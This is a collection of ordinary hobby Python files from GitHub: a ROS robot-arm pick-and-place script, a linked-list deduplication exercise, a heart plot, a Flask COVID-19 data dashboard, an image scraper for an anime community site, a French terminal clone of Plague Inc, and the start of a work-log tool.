first\n move_arm(pub_cmd, loop_rate, home, 4.0, 4.0)\n\n # move arm to start location and turn suction on\n move_arm(pub_cmd, loop_rate, Q[start_loc][start_height], 4.0, 4.0)\n gripper(pub_cmd, loop_rate, suction_on)\n # Delay to make sure suction cup has grasped the block\n time.sleep(1.0)\n\n print(\"*****\")\n print(\"moving from\", start_loc, \"height\", start_height, \"to\", end_loc, \"height\", end_height, \"digin\", digital_in_0)\n if digital_in_0 == 0:\n # rospy.logerr(\"BLOCK NOT FOUND. System quitting...\")\n rospy.loginfo(\"BLOCK NOT FOUND. 
System quitting...\")\n gripper(pub_cmd, loop_rate, suction_off)\n sys.exit()\n\n # move back to home before going to end location\n move_arm(pub_cmd, loop_rate, home, 4.0, 4.0)\n\n # move arm to end location and turn suction off\n move_arm(pub_cmd, loop_rate, Q[end_loc][end_height], 4.0, 4.0)\n gripper(pub_cmd, loop_rate, suction_off)\n time.sleep(1.0)\n\n\n return error\n\n\n#### custom helper function for main\ndef solveTowerOfHanoi(start, mid, end, height, pub_command, loop_rate, disk):\n global home\n global Q\n global SPIN_RATE\n global counter\n global from_height\n global to_height\n\n if disk == 1:\n start_height = from_height[counter]\n end_height = to_height[counter]\n move_block(pub_command, loop_rate, start, start_height, end, end_height)\n counter += 1\n return\n else:\n solveTowerOfHanoi(start, end, mid, height, pub_command, loop_rate, disk-1)\n start_height = from_height[counter]\n end_height = to_height[counter]\n move_block(pub_command, loop_rate, start, start_height, end, end_height)\n counter += 1\n solveTowerOfHanoi(mid, start, end, height, pub_command, loop_rate, disk-1)\n\n\n\n#### end of custom helper function\ndef move_linear(pub_cmd, loop_rate, height, vel, accel):\n for i in range(3):\n move_arm(pub_cmd, loop_rate, Q[i][height], vel, accel)\n\n\ndef main():\n\n global home\n global Q\n global SPIN_RATE\n\n global start_idx\n global mid_idx\n global end_idx\n global counter\n\n # Initialize ROS node\n rospy.init_node('lab2node')\n\n # Initialize publisher for ur3/command with buffer size of 10\n pub_command = rospy.Publisher('ur3/command', command, queue_size=10)\n\n # Initialize subscriber to ur3/position and callback fuction\n # each time data is published\n sub_position = rospy.Subscriber('ur3/position', position, position_callback)\n\n # TODO: define a ROS subscriber for ur3/gripper_input message and corresponding callback function\n sub_gripper = rospy.Subscriber('ur3/gripper_input', gripper_input, gripper_callback)\n\n\n\n # TODO: modify the code below so that program can get user input\n\n input_done = 0\n loop_count = 0\n \n \n # get user input for number of loops\n while(not input_done):\n input_string = raw_input(\"Enter number of loops \")\n print(\"You entered \" + input_string + \"\\n\")\n\n if(int(input_string) == 1):\n input_done = 1\n loop_count = 1\n elif (int(input_string) == 2):\n input_done = 1\n loop_count = 2\n elif (int(input_string) == 3):\n input_done = 1\n loop_count = 3\n elif (int(input_string) == 0):\n print(\"Quitting... 
\")\n sys.exit()\n else:\n print(\"Please just enter the character 1 2 3 or 0 to quit \\n\\n\")\n\n\n\n # Check if ROS is ready for operation\n while(rospy.is_shutdown()):\n print(\"ROS is shutdown!\")\n\n rospy.loginfo(\"Sending Goalss ...\")\n\n loop_rate = rospy.Rate(SPIN_RATE)\n\n \n\n while(loop_count > 0):\n # first move arm to home location\n move_arm(pub_command, loop_rate, home, 4.0, 4.0)\n\n ### test\n # move_arm(pub_cmd, loop_rate, dest, vel, accel)\n\n move_linear(pub_command, loop_rate, 0, 4.0, 4.0)\n \n move_arm(pub_command, loop_rate, home, 4.0, 4.0)\n\n move_linear(pub_command, loop_rate, 1, 4.0, 4.0)\n\n move_arm(pub_command, loop_rate, home, 4.0, 4.0)\n\n move_linear(pub_command, loop_rate, 2, 4.0, 4.0)\n\n move_arm(pub_command, loop_rate, home, 4.0, 4.0)\n\n move_arm(pub_command, loop_rate, Q[0][0], 4.0, 4.0)\n rospy.loginfo(\"Trying Suction on ...\")\n gripper(pub_command, loop_rate, suction_on)\n rospy.loginfo(\"Suction on ...\")\n # Delay to make sure suction cup has grasped the block\n time.sleep(1.0)\n if digital_in_0 == 0:\n # rospy.logerr(\"BLOCK NOT FOUND. System quitting...\")\n rospy.loginfo(\"BLOCK NOT FOUND. System quitting...\")\n gripper(pub_command, loop_rate, suction_off)\n sys.exit()\n else:\n rospy.loginfo(\"BLOCK FOUND\")\n gripper(pub_command, loop_rate, suction_off)\n sys.exit()\n\n ### end of test\n\n\n\n loop_count = loop_count - 1\n\n\n gripper(pub_command, loop_rate, suction_off)\n\n\n\n\nif __name__ == '__main__':\n\n try:\n main()\n # When Ctrl+C is executed, it catches the exception\n except rospy.ROSInterruptException:\n pass\n","repo_name":"jaehank2/Pick_and_Place_robot","sub_path":"src/projectandDriver/projectpkg_py/scripts/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":13929,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22109565592","text":"\"\"\"\n REMOVE DUPLICATES (CCI 2.1: REMOVE DUPS\n 50CIQ 40: DEDUP LINKED LIST)\n\n Write a function that removes all nodes of a given list with duplicate values.\n\n Consider the following linked list:\n\n 0 ⟶ 0 ⟶ 0 ⟶ 1 ⟶ 2 ⟶ 0 ⟶ 1 ⟶ 4 ⟶ 5\n\n Example:\n ll = Node(0, Node(0, Node(0, Node(1, Node(2, Node(0, Node(1, Node(4, Node(5)))))))))\n Input = ll # Or, the linked list above.\n Output = None # However, ll now has the form: 0 ⟶ 1 ⟶ 2 ⟶ 4 ⟶ 5\n\"\"\"\nimport copy\n\n\n# APPROACH: Naive/Brute Force\n#\n# Iterate over the nodes comparing each node to all following nodes, removing duplicates.\n#\n# Time Complexity: O(n**2), where n is the number of nodes in the linked list.\n# Space Complexity: O(1).\ndef remove_duplicates_naive(head):\n node = head\n while node:\n runner = node\n while runner.next:\n if runner.next.value == node.value:\n runner.next = runner.next.next\n else:\n runner = runner.next\n node = node.next\n return head\n\n\n# APPROACH: Via Previous Pointer & Set\n#\n# Traverse the linked list with a set to maintain previously seen values. Each time a new value is encountered, add the\n# value to the set, update previous.next to point to the (current) node, and set previous to the (current) node. At the\n# end of each iteration, the (current) node is assigned to its next value. 
Finally, (when node is None), assign\n# previous.next to None and return.\n#\n# Time Complexity: O(n), where n is the number of nodes in the linked list.\n# Space Complexity: O(u), where u is the number of unique values in the linked list.\ndef remove_duplicates_via_set(head):\n if head:\n prev = head\n node = head.next\n s = {head.value}\n while node:\n if node.value not in s:\n s.add(node.value)\n prev.next = node\n prev = node\n node = node.next\n prev.next = None\n return head\n\n\n# APPROACH: Via Set\n#\n# Using a set to maintain previously seen values, traverse the linked list. While the next node has a previously seen\n# value, update the (current) nodes pointer to be next.next. When a next value has not been seen, (current) node is\n# assigned to next node, and if node is not None, the value is added to the set.\n#\n# Time Complexity: O(n), where n is the number of nodes in the linked list.\n# Space Complexity: O(u), where u is the number of unique values in the linked list.\ndef remove_duplicates(head):\n node = head\n if node:\n s = {node.value}\n while node:\n while node.next and node.next.value in s:\n node.next = node.next.next\n node = node.next\n if node:\n s.add(node.value)\n return head\n\n\nclass Node:\n def __init__(self, value, next=None):\n self.value = value\n self.next = next\n\n def __iter__(self):\n yield self.value\n if self.next:\n yield from self.next\n\n def __repr__(self):\n return ' ⟶ '.join(map(repr, self))\n\n\nlinked_lists = [Node(0, Node(0, Node(0, Node(1, Node(2, Node(0, Node(1, Node(4, Node(5))))))))),\n Node(0, Node(1, Node(2, Node(3, Node(4, Node(5)))))),\n Node(0, Node(1, Node(0, Node(1, Node(3, Node(0)))))),\n Node(0, Node(1, Node(0, Node(1, Node(0, Node(0, Node(1, Node(1, Node(2))))))))),\n Node(6, Node(6, Node(6, Node(6, Node(6, Node(6, Node(6, Node(6, Node(6))))))))),\n Node(0, Node(1, Node(2, Node(3, Node(2, Node(1, Node(0))))))),\n Node(1, Node(1)),\n Node(1, Node(2)),\n Node(0),\n None]\nfns = [remove_duplicates_naive,\n remove_duplicates_via_set,\n remove_duplicates]\n\nfor head in linked_lists:\n for fn in fns:\n print(f\"{fn.__name__}({head}): {fn(copy.deepcopy(head))}\")\n print()\n\n\n","repo_name":"mpettersson/PythonReview","sub_path":"questions/data_structure/linked_list/remove_duplicates.py","file_name":"remove_duplicates.py","file_ext":"py","file_size_in_byte":3957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7028704669","text":"import matplotlib.pyplot as plt\r\nimport scipy as np\r\n\r\nx=np.linspace(-2,2,1000)\r\ny3=np.real(np.sqrt(abs(x)*(1-abs(x))))\r\ny4=np.real(-np.sqrt(1-np.sqrt(abs(x))))\r\nplt.plot(x,y3,color=\"red\")\r\nplt.plot(x,y4,color=\"red\")\r\nplt.xlim([-2,2])\r\nplt.show()\r\n","repo_name":"biswas-neelesh96/Python-Scripts","sub_path":"Heart.py","file_name":"Heart.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"31796395305","text":"from flask import Flask, render_template, request, jsonify, send_file, redirect, url_for\nfrom flask_mail import Mail, Message\nimport pandas as pd\nimport requests\nimport json\nimport plotly\nimport plotly.graph_objs as go\n\nwith open(\"info.json\", \"r\") as c:\n parameters = json.load(c)[\"parameters\"]\n\napp = Flask(__name__)\n\napp.config.update(\n MAIL_SERVER = 'smtp.gmail.com',\n MAIL_ASCII_ATTACHMENTS = True,\n MAIL_PORT = '465',\n MAIL_USE_SSL = True,\n MAIL_USERNAME = parameters['gmail-user'],\n 
MAIL_PASSWORD= parameters['gmail-password']\n)\n\nmail = Mail(app)\n\ndef create_plot(x,y):\n data = [ go.Bar( x=x, y=y)]\n graphJSON = json.dumps(data, cls=plotly.utils.PlotlyJSONEncoder)\n return graphJSON\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/tabular')\ndef tabular():\n regional_data = requests.get('https://api.rootnet.in/covid19-in/contacts')\n regional_data = regional_data.json()[\"data\"][\"contacts\"][\"regional\"]\n notifications = requests.get('https://api.rootnet.in/covid19-in/notifications')\n notifications = notifications.json()[\"data\"][\"notifications\"]\n hospital_bed = requests.get('https://api.rootnet.in/covid19-in/hospitals/beds')\n hospital_bed = hospital_bed.json()[\"data\"][\"regional\"]\n medical_col_bed = requests.get('https://api.rootnet.in/covid19-in/hospitals/medical-colleges')\n medical_col_bed = medical_col_bed.json()[\"data\"][\"medicalColleges\"]\n return render_template('tabular.html', medical_col_bed = medical_col_bed, regional_data = regional_data, notifications = notifications, hospital_bed = hospital_bed)\n \n\n@app.route('/statical')\ndef statical():\n dataset = pd.read_csv('covid19india.csv')\n dataset = dataset.drop(['onsetEstimate', 'notes', 'contractedFrom' ], axis = 1)\n dataset = dataset[['patientId', 'reportedOn', 'ageEstimate','gender','state','status']] \n deceased_df = dataset.loc[dataset['status'] == 'Deceased']\n gen_df = deceased_df.pivot_table(index=['gender'], aggfunc='size')\n gen_cat = [\"female\",\"male\"]\n gen=[]\n for i in gen_df:\n gen.append(i)\n state_df = deceased_df.pivot_table(index=['state'], aggfunc='size')\n state_name = [\"Bihar\", \"Delhi\", \"Gujarat\", \"Himachal Pradesh\", \"Jammu and Kashmir\", \"Karnataka\", \"Kerala\", \"Madhya Pradesh\", \"Maharashtra\",\n \"Odisha\", \"Punjab\", \"Rajasthan\", \"Tamil Nadu\", \"Telangana\", \"Uttar Pradesh\", \"West Bengal\"]\n state_case = []\n for i in state_df:\n state_case.append(i)\n date_df = deceased_df.pivot_table(index=['reportedOn'], aggfunc='size')\n date_ddf = [\"02-04-2020\", \"03-04-2020\", \"04-04-2020\", \"05-04-2020\", \"06-04-2020\", \"07-04-2020\", \"08-04-2020\", \"09-04-2020\", \"10-04-2020\", \"11-04-2020\", \"12-04-2020\",\n \"13-04-2020\", \"14-04-2020\", \"15-04-2020\", \"16-04-2020\", \"17-04-2020\", \"18-04-2020\", \"19-04-2020\", \"20-04-2020\", \"21-04-2020\", \"22-04-2020\", \"23-04-2020\",\n \"24-04-2020\", \"25-04-2020\", \"26-04-2020\", \"27-04-2020\", \"28-04-2020\", \"29-04-2020\", \"30-04-2020\", \"31-04-2020\"]\n date_df_total = []\n for i in date_df:\n date_df_total.append(i)\n age_group = [\"1-10\",\"11-20\",\"21-30\",\"31-40\",\"41-50\",\"51-60\",\"61-70\",\"71-80\",\"81-90\"]\n age_death = [1,0,1,2,7,5,17,9,1]\n plot_state = create_plot(state_name, state_case)\n plot_gender = create_plot(gen_cat, gen)\n plot_age = create_plot(age_group, age_death)\n plot_date = create_plot(date_ddf, date_df_total)\n return render_template('graphs.html', plot_state = plot_state, plot_gender = plot_gender, plot_age = plot_age, plot_date = plot_date)\n\n\n@app.route('/api')\ndef api():\n dataset = pd.read_csv('covid19india.csv')\n dataset = dataset.drop(['onsetEstimate', 'notes', 'contractedFrom' ], axis = 1)\n dataset = dataset[['patientId', 'reportedOn', 'ageEstimate','gender','state','status']]\n dataset = dataset.to_dict()\n return jsonify(dataset)\n\n\n@app.route('/mailme', methods=['GET', 'POST'])\ndef mailme():\n if request.method == 'POST':\n email = request.form.get('email')\n msg = Message(subject 
= 'Covid graph', body = 'Hey! U will find attached pdf with all the relevent data!', sender = parameters['gmail-user'], recipients = [email]) \n with app.open_resource('Doc1.pdf') as fp:\n msg.attach(\"Doc1.pdf\",\"attachment/pdf\",fp.read())\n mail.send(msg)\n return redirect( url_for('statical'))\n\n\n@app.route('/download')\ndef download():\n return send_file('Doc1.pdf', attachment_filename='Doc1.pdf', as_attachment=True)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"EternityProjects-real/VIT-hack2020","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4537,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"73194083946","text":"from multiprocessing.pool import ThreadPool\nimport requests\nimport click\nimport os\nimport json\n\n\nclass Hanime:\n def __init__(self, folder='./hanime'):\n self.page = 1\n self.last_id = 0\n self.folder = folder\n if not os.path.isdir(self.folder):\n os.makedirs(self.folder)\n\n def scrape_images(self):\n if self.last_id == 0:\n link = \"https://hr.hanime.tv/api/v8/community_uploads?channel_name__in[]=media&channel_name__in[]=nsfw-general&kind=landing&loc=https://hanime.tv\"\n else:\n link = f\"https://hr.hanime.tv/api/v8/community_uploads?channel_name__in[]=media&channel_name__in[]=nsfw-general&channel_name__in[]=yuri&query_method=seek&before_id={self.last_id}&loc=https://hanime.tv\"\n r = requests.get(link).json()\n self.last_id = r['data'][-1]['id']\n return r['data']\n\n def next_page(self):\n self.page += 1\n\n def download(self, image):\n filename = \"id='{}' channel_name='{}' uploader='{}'.{}\".format(image['id'], image['channel_name'], image['username'], image['extension'])\n illegal = ['<', '>', ':', '\"', '/', '\\\\', '|', '?', '*']\n for i in illegal:\n if i in filename:\n filename = filename.replace(i, '')\n\n filepath = os.path.join(self.folder, filename)\n\n if os.path.isfile(filepath + '.temp'):\n os.remove(filepath + '.temp')\n if not os.path.isfile(filepath):\n with open(filepath + '.temp', 'wb') as f:\n print(\"Downloading: \", filename)\n f.write(requests.get(image['url']).content)\n os.replace(filepath + '.temp', filepath)\n\n\n@click.command()\n@click.option('--pages', '-p', required=False, default=0)\n@click.option('--download-dir', '-d', 'folder', required=False, default='./hanime', type=str) # noqa\ndef main(pages, folder):\n imgs = []\n scraper = Hanime(folder)\n\n if not pages:\n pages = [1]\n else:\n pages = [x for x in range(pages)]\n for i in pages:\n print('Current page: {}'.format(scraper.page))\n posters = scraper.scrape_images()\n\n results = ThreadPool(15).imap_unordered(scraper.download, posters)\n for i in results:\n pass\n scraper.next_page()\n\n print('Done!')\n\n\nmain()\n","repo_name":"ArjixWasTaken/A-collection-of-sauce-scrapers-that-I-made","sub_path":"hanime.py","file_name":"hanime.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16589475672","text":"#! /usr/bin/env python3\n\n#___________________________________________Nongma SORGHO___________________________________________#\n#Ceci est une implémentation de ce qui pourrait être l'algorithme à la base du jeu Plague Inc.\n\n\"\"\"\nPlague Inc. 
est un jeu dans lequel la population mondiale évolue en fonction de certaines variables de maladie.\nJe réaliserai cette expérience pour une maladie bactérienne dont les paramètres symptomatique, de transmission et\nde létalité posséderont 3 niveaux de dangérosité.\nJe prendrai une population mondiale à 7 milliards en supposant que 20% des individus appliquent les règles élémentaires\nd'hygiène, ce qui entravera quelque peu l'évolution de la maladie si elle se trouve en des niveaux peu élevés.\nUn autre facteur empêchant, et pouvant même stopper la propagation de la maladie et qui sera pris en compte par cet\nalgorithme est la recherche qui est menée sur le plan international et qui aboutit après 5 minutes de jeu en temps réel.\nEn début de jeu, le joueur dispose d'un crédit qui lui permettra de faire les améliorations génétiques sur sa maladie.\nPar ailleurs, ce crédit augmentera de 95 unités chaque seconde. Il devra donc faire une efficiente utilisation de son\ncrédit pour atteindre la victoire ! Il existe des mots bonus rapportant une certaine quantité de crédits mais qui\nne pourront être tapés en une seconde que par les plus rapides des joueurs. Alors, seuls les plus expérimentés des joueurs\npourront espérer gagner le niveau difficile.\nPour les symptomes :\n- Niv.1 : 113803 morts/sec Prix : 1000 crédits\n- Niv.2 : 2*113803 morts/sec Prix : 2000 crédits\n- Niv.3 : 3*113803 morts/sec Prix : 3000 crédits\nPour la transmitivité : #Notez que les dégâts infligés par une transmissivité plus grande évolueront de manière exponentielle, ces valeurs sont donc données à titre indicatif\n- Niv.1 : + 20% de victimes en plus Prix : 2000 crédits\n- Niv.2 : + 40% de victimes en plus Prix : 4000 crédits\n- Niv.3 : + 60% de victimes en plus Prix : 8000 crédits\nPour la létalité :\n- Niv.1 : 250520 morts/sec Prix : 1500 crédits\n- Niv.2 : 2*250520 morts/sec Prix : 3000 crédits\n- Niv.3 : 3*250520 morts/sec Prix : 5000 crédits\n\"\"\"\n\nimport time\nimport signal\nimport os\nimport random\n\npopulation = 7000000000\nrecherche = 0\ncredit = 2500\nniveau_symptome = 0\nniveau_transmissivite = 0\nniveau_letalite = 0\nsymptome = 113803\ntransmissivite = 0.2\nletalite = 250520\ncompteur = 0\n\ndef routine_principale() :\n print(\" Bienvenue sur Plague Inc. 
by Gerard!\\n\")\n time.sleep(3)\n for i in range(3 , 0, -1) :\n if i == 1 :\n print(\" Une nouvelle partie débutera dans\", i, \"seconde\\n\")\n time.sleep(1)\n os.system('cls')\n else :\n print(\" Une nouvelle partie débutera dans\", i, \"secondes\\n\")\n time.sleep(1)\n os.system('cls')\n reponse = str(input(\" Bienvenue sur la version minimaliste, si on puisse se le permettre, de Plague Inc.\\n Touchez 'C' pour commencer la partie\\n\"\n \" Vous trouverez les instructions et l'aide de jeu en appuyant sur 'A'\\n Appuyez sur 'Q' pour quitter la partie\\n\"))\n if reponse == \"C\" or reponse == \"c\" :\n dif = str(input(\" Vous avez le choix entre trois (03) niveaux de difficulté : 'F' pour Facile, 'M' pour moyen et 'D' pour Difficile.\\n Veuillez choisir s'il vous plait !\\n\"))\n if dif == \"F\" or dif == \"f\" :\n return maladie(population, recherche, credit, symptome,\n niveau_symptome, transmissivite, niveau_transmissivite, letalite, niveau_letalite, compteur, 1)\n if dif == \"M\" or dif == \"m\" :\n return maladie(population, recherche, credit, symptome,\n niveau_symptome, transmissivite, niveau_transmissivite, letalite, niveau_letalite, compteur,\n 0.5)\n if dif == \"D\" or dif == \"d\" :\n return maladie(population, recherche, credit, symptome,\n niveau_symptome, transmissivite, niveau_transmissivite, letalite, niveau_letalite, compteur,\n 0.2)\n if reponse == \"A\" or reponse == \"a\" :\n print(\"Vous disposerez d'une seconde pour chaque instruction que vous taperez\\n\"\n \"Pour les symptomes : 'S'\\n\"\n \"- Niv.1 : 113803 morts/sec Prix : 1000 crédits\\n\"\n \"- Niv.2 : 2*113803 morts/sec Prix : 2000 crédits\\n\"\n \"- Niv.3 : 3*113803 morts/sec Prix : 3000 crédits\\n\"\n \"Pour la transmitivité : 'T'\\n#Notez que les dégâts infligés par une transmissivité plus grande évolueront de manière exponentielle, ces valeurs sont donc données à titre indicatif\\n\"\n \"- Niv.1 : + 20% de victimes en plus Prix : 2000 crédits\\n\"\n \"- Niv.2 : + 40% de victimes en plus Prix : 4000 crédits\\n\"\n \"- Niv.3 : + 60% de victimes en plus Prix : 8000 crédits\\n\"\n \"Pour la létalité : 'L'\\n\"\n \"- Niv.1 : 250520 morts/sec Prix : 1500 crédits\\n\"\n \"- Niv.2 : 2*250520 morts/sec Prix : 3000 crédits\\n\"\n \"- Niv.3 : 3*250520 morts/sec Prix : 5000 crédits\\n\"\n \"#Vous aurez 200 crédits en tapant 'cadeau'\\n#Vous aurez 500 crédits en tapant 'chanceux' avec une chance de 75%\\n#Vous aurez 100 crédits en tapant 'cent\\n\"\n \"Appuyez 'R' pour retourner au jeu et 'Q' pour quitter\\n\")\n a = str(input())\n if a == 'R' or a == 'r' :\n return routine_principale()\n else :\n return\n if reponse == \"Q\" :\n return\n\ntotal = 0\ndef maladie(population, recherche, credit, symptome,\n niveau_symptome, transmissivite, niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte) :\n global total\n total += credit\n couleurs = ['echo \"\\033[30m Plague Inc., par Gérard!\\033[00m\"', 'echo \"\\033[31m Plague Inc., par Gérard!\\033[00m\"', 'echo \"\\033[32m Plague Inc., par Gérard!\\033[00m\"',\n 'echo \"\\033[33m Plague Inc., par Gérard!\\033[00m\"',\n 'echo \"\\033[34m Plague Inc., par Gérard!\\033[00m\"', 'echo \"\\033[35m Plague Inc., par Gérard!\\033[00m\"',\n 'echo \"\\033[36m Plague Inc., par Gérard!\\033[00m\"', 'echo \"\\033[37m Plague Inc., par Gérard!\\033[00m\"']\n os.system(couleurs[random.randint(0,7)])\n print(\"Avancée de la recherche :\", int(recherche), \"%\\n\\n\"+\" Population :\", int(population), \" Morts :\", int(7e9-population), \"\\n\\n\"+\" Crédit :\", credit, 
\"\\n\\n\"\n \" Niveaux :\",\n \"Gène S: Niv.\" + str(niveau_symptome)+\" | \", \"Gène T: Niv.\" + str(niveau_transmissivite)+\" | \",\n \"Gène L: Niv.\" + str(niveau_letalite)+\" \\n\")\n action = str(entree(\"#Instructions pour les passages de niveaux des paramètres de votre maladie :\\n#Vous taperez 'S' pour Symptome, 'T' pour transmissivité, \"\n \"'L' pour létalité\\n#Vous aurez 200 crédits en tapant 'cadeau'\\n#Vous aurez 500 crédits en tapant 'chanceux' avec une chance de 75%\\n#Vous aurez 100 crédits en tapant 'cent'\\n\\n\"))\n if population <= 0.0 :\n score = total + 20000/recherche\n print(\"Avancée de la recherce :\", recherche, \"%\\n\\n Population : 0\", \"\\n\\n Crédit :\", credit, \"\\n\\n\"\n \"Niveaux :\",\n \"Gène S: Niv.\"+str(niveau_symptome)+\" \", \"Gène T: Niv.\"+str(niveau_transmissivite)+\" \", \"Gène L: Niv.\"+str(niveau_letalite)+\" \\n\\n\")\n print(\"$$$$$Vous avez gagné, votre maladie a exterminé la population mondiale!$$$$$\\n\"\n \"Votre score est de\", score)\n rejouer = str(input(\"*Souhaitez-vous rejouer ? (Répondez par 'O' pour Oui et 'N' pour Non)*\\n\"))\n if rejouer == 'O' or rejouer == 'o' :\n return routine_principale()\n else :\n print(\"*A bientôt pour une nouvelle partie de Plague Inc.*\")\n return\n if recherche >= 100 :\n score = total + 20000 / recherche\n print(\" Avancée de la recherce : 100\", \"%\\n\\n Population :\", population, \"\\n\\n Crédit :\", credit, \"\\n\\n\"\n \"Niveaux :\",\n \"Gène S: Niv.\" + str(niveau_symptome) + \" \", \"Gène T: Niv.\" + str(niveau_transmissivite) + \" \",\n \"Gène L: Niv.\" + str(niveau_letalite) + \" \\n\\n\")\n print(\"____Vous avez échoué, un remède a été trouvé à votre maladie !____\\n\"\n \"Votre score est de\", score)\n rejouer = str(input(\"*Souhaitez-vous rejouer ? 
(Répondez par 'O' pour Oui et 'N' pour Non)*\\n\"))\n if rejouer == 'O':\n return routine_principale()\n else:\n print(\"*A bientôt pour une nouvelle partie de Plague Inc.*\")\n return\n else :\n os.system('cls')\n compteur += difficulte\n if recherche >= 80 :\n recherche += 0.54\n if recherche < 80 :\n recherche += 0.36\n credit += 95\n population -= (symptome * niveau_symptome + letalite * niveau_letalite) + (symptome * niveau_symptome + letalite * niveau_letalite) * transmissivite * niveau_transmissivite * compteur\n if action == \"cheat\" or action == \"CHEAT\" or action == \"tri\" or action == \"TRI\" :\n population -= 1000000000\n if action == 'chanceux' or action == 'CHANCEUX' :\n if random.random() >= 0.75 :\n credit += 500\n if action == \"cadeau\" or action == \"CADEAU\" :\n credit += 200\n if action == \"cent\" or action == \"CENT\" :\n credit += 100\n if (action == \"S\" or action == 's') and niveau_symptome <= 2 :\n if niveau_symptome == 0 and credit >= 1000:\n credit -= 1000\n niveau_symptome += 1\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_symptome == 0 and credit < 1000:\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_symptome == 1 and credit >=2000 :\n credit -= 2000\n niveau_symptome += 1\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_symptome == 1 and credit < 2000:\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_symptome == 2 and credit >= 3000 :\n credit -= 3000\n niveau_symptome += 1\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_symptome == 2 and credit < 3000:\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if (action == \"T\" or action == \"t\") and niveau_transmissivite <= 2 :\n if niveau_transmissivite == 0 and credit >= 2000 :\n credit -= 2000\n niveau_transmissivite += 1\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_transmissivite == 1 and credit < 2000:\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_transmissivite == 1 and credit >= 4000 :\n credit -= 4000\n niveau_transmissivite += 1\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_transmissivite == 1 and credit < 4000:\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_transmissivite == 2 and credit >= 8000 :\n credit -= 8000\n niveau_transmissivite += 1\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n 
niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_transmissivite == 2 and credit < 8000:\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if (action == \"L\" or action == \"l\") and niveau_letalite <= 2 :\n if niveau_letalite == 0 and credit >= 1500 :\n credit -= 1500\n niveau_letalite += 1\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_letalite == 0 and credit < 1500:\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_letalite == 1 and credit >= 3000 :\n credit -= 3000\n niveau_letalite += 1\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_letalite == 1 and credit < 3000:\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_letalite == 2 and credit >= 5000 :\n credit -= 5000\n niveau_letalite += 1\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n if niveau_letalite == 2 and credit < 5000:\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n else :\n return maladie(population, recherche, credit, symptome, niveau_symptome, transmissivite,\n niveau_transmissivite, letalite, niveau_letalite, compteur, difficulte)\n\nclass AlarmException(Exception):\n pass\n\ndef alarmHandler(signum, frame):\n raise AlarmException\n\ndef entree(Prompt='', timeout=1):\n signal.signal(signal.SIGALRM, alarmHandler)\n signal.alarm(timeout)\n try:\n text = input(Prompt)\n signal.alarm(0)\n return text\n except AlarmException:\n print ('\\nJeu développé par Nongma SORGHO')\n signal.signal(signal.SIGALRM, signal.SIG_IGN)\n return ''\n\n\nroutine_principale()\n\n","repo_name":"Atepir/plague.py","sub_path":"plague.py","file_name":"plague.py","file_ext":"py","file_size_in_byte":16561,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72861679467","text":"from util import *\n\n\nclass Worklog:\n\n def quit_program(self):\n \"\"\"This quits the application\"\"\"\n print(\"Thank you for using WORK LOG. Goodbye.\")\n exit()\n\n def main_menu(self):\n \"\"\"This brings up the main menu of the program. Allowing\n users to pick which task they would like to do\n \"\"\"\n\n menu_options = {'a': self.add_entry, 'b': self.search_entry,\n 'c': self.quit_program}\n\n while True:\n 